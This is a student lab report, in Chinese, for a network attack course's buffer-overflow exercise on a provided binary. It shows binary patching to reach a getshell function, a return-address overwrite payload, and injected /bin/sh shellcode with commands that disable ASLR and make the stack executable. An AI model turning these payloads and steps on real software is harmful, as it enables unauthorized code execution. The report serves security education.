2018-2019-2 20165225《网络对抗技术》Exp1 缓冲区溢出实验

2018-2019-2 20165225《网络对抗技术》Exp1 缓冲区溢出实验

---

声明

• 虽然老师在邮箱中要求要把虚拟机名改为个人名字缩写，但是我的kali好像不是很听话...重启数次也没用，在此声明bakugou就是我（是的我就是咔酱！）

• 

• 实验部分

• 实验点1：逆向及Bof基础实践

• 实验开始前，老师给了我们一个pwn1文件，先让我们来看看它是做什么的：

• 

• 和实验指导中说的一样，pwm1正常执行可简单回显任何用户输入的字符串。

• 在这里我们首先养成一个好习惯，将原代码其复制一下，并将新文件命名为2016522，完成之后，我们便可通过反汇编查看20165225中的具体信息啦

  反汇编指令：objdump -d 20165225（名称）

• 

• 

• 由于代码较长，我便截了两个我们比较关心的函数，一个是主函数main，和我们需要利用的foo函数，易见他们的跳转代码。

• 我们若是想利用缓冲区漏洞，将代码跳转到我们想执行的区域，就要了解他是怎么跳的：

• 首先看跳转指令执行后的下一个地址80484ba，以及跳转之后到达的foo函数地址8048491，显而易见应该是进行了加减运算实现了地址偏移，我们计算来验证一下：

• 80484ba - 8048491 = 4ba - 491 = 0x29

• 0x29 =41，补码为d7ffffff，即跳转指令的机器码。

• 由此我们可知跳转的下一地址加上偏移量即可得到转移后的地址，我们想触发这个代码中的getshell函数，就要把偏移量计算出来：

• 

• 图中getshell的地址为804847d，则我们需要的偏移量补码为804847d - 80484ba = 47d - 4ba = -3d,即c3

• 我们可通过vim 20145211查看原码，接着使用指令%！xxd将原码调成16进制显示。

• 我们可通过/ + 关键词查找到d7ffffff，单击键盘i进入编辑模式，将d7修改为c3

• 

• 修改完成后输入esc退出编辑模式，再输入%!xxd -r变回原码，输入wq保存并退出。

• 结果可见我们成功跳转到了getshell函数

• 

• 实验点2：自己构造输入参数使缓冲区溢出

• 实验开始时我们同样养成cp的好习惯，将新可执行文件命名为wgy，开始gdb调试。

• 我们通过r命令将其运行起来，并输入一个超过其缓冲区的数（不停的试），直到他的eip出现错误提示

• 下图我们可以看到代码报错了，此时的eip指令寄存器存储的地址为0x35353535，此ASCII值代表5555，我们便知道我们输入的一大串中的5555覆盖了原来的地址，但是我一共打了8个5,并不知道是哪4个覆盖了。

• 

• 于是我将输入中的5改成不一样的数字以便后续观察

• 

• 查看指令寄存器eip内的值为0x34333231，表示4321(小端显示),由此可知，我们输入的字符串1111111122222222333333334444444412345678中的1234覆盖了返回地址的值，所以接下来我们需要修改1234的值为0804847d（getshel地址）进行覆盖。

• 由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值，所以先生成包括这样字符串的一个文件。

• 我们可通过命令行输入perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input（\x0a表示回车）重定向一个input文件，并使用xxd查看其16进制内容。

• 我们通过管道|，把input作为20154305的输入，覆盖返回地址,完整命令为(cat input; cat) | ./wgy

• 运行shell指令ls,发现成功运行。

• 

• 实验点3：注入shellcode并执行（RNS)

• 使用apt-get installexecstack命令安装execstack。

• • 

• 然后接连输入：

execstack -s pwn1

execstack -q pwn1

more /proc/sys/kernel/randomizevaspace

2

echo "0" > /proc/sys/kernel/randomizevaspace

more /proc/sys/kernel/randomizevaspace

0

• 

• 使用命令perl -e 'print "A" x 32;print "\x04\x03\x02\x01\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input2 注入input2，前面32个A用来填满buf，\x04\x03\x02\x01为预留的返回地址，下面找这个返回地址。

• 在终端里用 (cat input2;cat) | ./5225wgy 作为输入，回车后不要动这个终端，然后去打开另一个终端。

• 在第二个终端中ps -ef | grep 5225wgy查看pwn进程号,gdb5225wgy,使用attach 进程号 去查看进程。

• 使用disassemble foo 命令反汇编代码，用 break *0x080484ae 命令设置断点，来查看注入buf的内存地址：
  
  ，输入c继续运行，同时在原来的终端敲回车，使其继续执行。再返回调试终端，使用info r esp命令查找地址

• 用x/16x 0xffffd2bc命令查看其存放内容，看到了0x01020304，就是返回地址的位置。根据我们构造的input2可知，shellcode就在其后，所以地址应为0xffffd2c0

• 接下来只需要将之前的\x4\x3\x2\x1改为这个地址即可，用命令 perl -e 'print "A" x 32;print "\xc0\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input2
  
  再用 (cat input_shellcode;cat) | ./5225wgy

• 可见攻击成功（就是结果有点怪..）

• 

• 报告部分

• 实验收获与感想

• 答：实验还行，没有遇到什么没有解决的问题，也没有比较难懂的地方，就是计算方面有点忘了（虽然上学期刚学完），之后询问同学得以解决。

• 什么是漏洞？漏洞有什么危害？

• 答：漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，是受限制的计算机、组件、应用程序或其他联机资源的无意中留下的不受保护的入口点。

• 危害：可以使攻击者能够在未授权的情况下访问或破坏系统。

遇到的问题：

• echo "0" > /proc/sys/kernel/randomizevaspace输入后显示bash:/proc/sys/kernel/randomize_va_space :权限不够

• 解决：使用sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"即可关闭ASLR

• 掌握NOP, JNE, JE, JMP

• 答：百度可得

NOP：无作用，英文"no operation"的简写，意思是"do nothing"(机器码90)

JNE：若不相等则跳(机器码75）

JE：若相等则跳(机器码74）

JMP：无条件转移指令。段内直接短转Jmp

CMP指令：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。（机器码38）

• CMP汇编指令的机器码

• 答：见本实验内容

• 掌握反汇编与十六进制编程器

• 答：见本实验内容

• 能正确修改机器指令改变程序执行流程

• 答：见本实验内容

• 能正确构造payload进行bof攻击

• 答：见本实验内容